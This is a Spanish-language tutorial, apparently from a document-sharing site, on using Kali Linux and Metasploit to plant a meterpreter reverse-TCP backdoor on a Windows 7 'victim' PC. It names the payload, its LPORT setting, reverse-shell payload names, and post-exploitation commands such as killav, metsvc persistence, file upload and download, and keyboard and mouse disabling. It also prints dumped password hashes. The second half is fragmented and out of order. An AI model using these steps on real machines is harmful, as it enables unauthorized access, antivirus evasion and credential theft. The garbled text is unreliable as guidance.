Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Hola hackers de tiempo compartido, hoy vamos a ver cómo acceder a una pc
desde kali Linux a Windows 7.
Todos sabemos que la tecnología avanza a pasos agigantados, pero muchas veces
no somos conscientes de los riesgos que acarrea, para algunos pero para otros son
beneficios.
Por diversos motivos debemos saber cómo acceder a una pc desde otra, uno de
ellos y el más importante es aprender a defendernos antes un ataque informático
y conocer las técnicas que pueden utilizar para encontrar vulnerabilidades en
nuestra pc.
Antes que nada recomiendo practicar este ataque informático en nuestra propia
pc, creando máquinas virtuales con diferentes sistemas operativos, ya que si lo
hacemos a una pc externa a nuestra red o sin el consentimiento de la víctima, está
penado por la ley y es delito.
COMENZAMOS CON EL
TUTORIAL HACKING
CON KALI
LINUX UTILIZANDO
“MSFCONSOLE” CREANDO
CONEXIÓN REMOTA
(PARTE I):
La idea es crear un backdoor ejecutable que nos de la opción de crear una puerta
trasera (backdoor) en la pc de la víctima.
1 PASO:
Que es un exploits?
Las definiciones habituales hablan de un programa o código que se aprovecha
de un agujero de seguridad (vulnerabilidad) en un sistema, de forma que un
atacante podría usarla en su beneficio.
Trasladado a la vida real, sería como si un modelo de cerradura (sistema o
aplicación) tuviera un fallo de diseño que nos permitiera crear llaves que la
abrieran (exploit) y poder así acceder al sitio que trata de proteger y realizar
actos delictivos (malware).
Existe confusión entre los usuarios y cierto mito de que un exploit puede
considerarse malware. La realidad es que, tal y como hemos visto en el ejemplo,
no es un código malicioso en sí mismo, sino que es la llave para que estos
accedan a nuestro sistema.
De esta forma, puede proporcionarles los permisos necesarios para poder
ejecutarse en un sistema e infectarlo aprovechándose de una vulnerabilidad.
Que es metasploit framework?
El FrameWork de Metasploit es una herramienta de penetración de código libre,
desarrollado para ejecutar exploits a un objetivo remoto. Metasploit cuenta con
la mayor base de datos de exploits públicos, probados y puede ser usado para
detectar las vulnerabilidades de nuestros sistemas para protegerlos o usar esas
vulnerabilidades para obtener acceso a sistemas remotos. Es una herramienta
bastante poderosa para los test de penetración y es algo que todo profesional de
seguridad debe dominar. Puede ser un poco complicado al inicio pero todo es
cuestión de paciencia y dedicación.
El framework de Metasploit ha sido una de las herramientas más utilizadas por
los profesionales de seguridad informática para llevar a cabo sus test de
penetración y auditorias de seguridad pero era muy poco conocido. Esa
situación cambio significativamente cuando el personal de Offensive Security
(unos genios) desarrollo un curso en línea para enseñar el uso de esta
herramienta.
Con estos conceptos podemos empezar con kali Linux:
Abrimos una consola y escribimos lo siguiente “msfconsole” y
presionamos intro.
Recuerden que deben iniciar la conexión a la base datos con postgresql, para
ello deben activarlo:
Puedes colocar en la consola “show exploits” para que despliegue una lista de
exploits el cual tu debes de elegir el apropiado para tu ataque.
Que es Payload?
Hablábamos de que las vulnerabilidades o errores presentes en cualquier
software pueden ser aprovechadas para producir efectos inesperados en los
equipos, una vez descubierto ese fallo se desarrollaban pequeños programas
(exploits) para forzar de forma específica ese error en el sistema.
Además de conseguir que el software produzca ese error lo ideal sería poder
aprovecharlo para que el equipo realice las funciones que yo desee.
Esa parte del software que nos brinda una función ante un error es el Payload,
la ventaja de este planteamiento es que el mismo payload puede ser utilizado por
distintos exploits y un mismo exploit puede utilizar varios payloads, una
programación modular fantástica.
Un ejemplo claro asociamos a payload con la estructura de un virus tripartita:
1)Mecanismo de reproducción Infección que genera copias del virus “pegadas”
en ficheros ejecutables o en el sector de arranque de discos (en realidad son
programas también).
2)Detonante (trigger) Esta parte del virus (de su código) se encarga de
comprobar si se cumplen las situaciones previstas por el programador. Cuando
se cumplan una o varias circunstancias: puede ser una fecha concreta, una
acción por parte del usuario, etc.
3)Carga (payload) La acción que realiza el virus. No tiene por qué ser
destructivo: puede ser mostrar una ventana, un mensaje, etc. Entre los payload
destructivos o perjudiciales pueden encontrarse desde el borrado de ficheros
hasta el envío de información confidencial a destinos no autorizados. El virus
intentará sobrevivir el máximo tiempo posible e infectar al mayor número de
ficheros y/o ordenadores.
Para esto, desde el sencillo “Brain” en 1986, se usan las llamadas técnicas de
ocultación, que buscan engañar al usuario y a los antivirus. Uno de los mitos
más persistentes hacen referencia a las llamadas “mutaciones” de los virus, que
en la mayoría de las ocasiones son cambios que realizan determinados
programadores sobre el código de un virus o gusano exitoso (y los medios de
comunicación no se refieren al polimorfismo sino a lo citado). Otro es que la
infección vírica destruye, pero la realidad es que no es destructora salvo errores
(bugs) de programación. Lo que puede destruir es el “payload”.
Por ahora dejaremos acá, pronto continuamos con la parte II.
Este protocolo SMB también se llama CIFS, aunque el nombre SMB tiene un uso
más amplio. Los servidores SMB se utilizan para administrar y mantener los
servicios de pequeñas y medianas empresas a través de una red o servicio de
Active Directory en un entorno de red de Windows.
Luego vamos a configurar el LPORT, esta se encarga de configurar el
puerto del servidor SMB (4321).
Es hora ejecutar el payload y crear el backdoor ejecutable, siempre
recomendable hacer un “show payload” en la consola para ver cuales
son los payload disponibles y sus actualizaciones.
Por ejemplo:
osx/ppc/shell/reverse_tcp
osx/ppc/shell_reverse_tcp
************************************************************
#La utilización de herramientas y habilidades similares a los atacantes con el
ánimo de hacer un aporte a la seguridad y hacer el bien.
************************************************************
#La utilización en carácter fuera de la ley vigente el uso de las herramientas
informáticas descriptas en los tutoriales, no es responsabilidad del
administrador del sitio.
************************************************************
Características de meterpreter:
background <core>
Permite establecer el proceso de la consola meterpreter a un proceso
atacante, eventualmente se puede volver a activar este proceso por
medio del comando sesión:
migrate <Core>
[*] The Terminal Services service is not set to auto, changing it to auto …
metsvc
* Starting service
killav
meterpreter >
cd, rm, rmdir, pwd, ls, upload, download, cat edit, del, mkdir <File System
Commands>
Se trata de los comandos básicos para consulta y manipulación de
ficheros, su uso es equivalente a los comandos del mismo nombre
disponibles en sistemas basados en UNIX, sin embargo estos comandos
se ejecutan en el sistema remoto por medio del interprete meterpreter
cd:
pwd:
upload:
download:
mkdir :
cat :
Edit:
Channel 11 created.
meterpreter > getpid
Channel 15 created.
Channel 16created.
Id Class Type
— —– —-
11 3 stdapi_process
12 3 stdapi_process
13 3 stdapi_process
c:\>exit
meterpreter > channel -l
Session 0\WinSta0\Default
Disabling keyboard…
Enabling keyboard…
Disabling mouse…
Enabling mouse…
Administrator:500:asdfghjkll1404eeaad3b435b51404ee:31d6cfe0d16ae9
31b73c59d7e0c089c0:::
ASPNET:1004:f398e05bcb3llllllf92d55aff8ce62c:86ceb0fb2a9e29524943f
ed3ef434477:::
Naldo:1007:f920b27cf8b06ac9alllllllb51404ee:c52abb1e14677d7ea228fc
c1171ed7b7:::
SUPPORT_388945a0#:1002:aad3b435b51404eelld3b435b51404ee:537
6b4d52202b447093e4651b63d1572:::
OPTIONS:
-h Help banner
Luego debemos colocar para activar el uso del payload > set payload
windows/meterpreter/reverse_tcp y presionamos intro.
Wikipedia VNC
En la imagen de abajo mostramos el backdoor en todo su esplendor,
ejecutandoce como proceso y dejándonos la pc victima a nuestra
disposición.
************************************************************
#La utilización de herramientas y habilidades similares a los atacantes con el
ánimo de hacer un aporte a la seguridad y hacer el bien.
************************************************************
#La utilización en carácter fuera de la ley vigente el uso de las herramientas
informáticas descriptas en los tutoriales, no es responsabilidad del
administrador del sitio.
************************************************************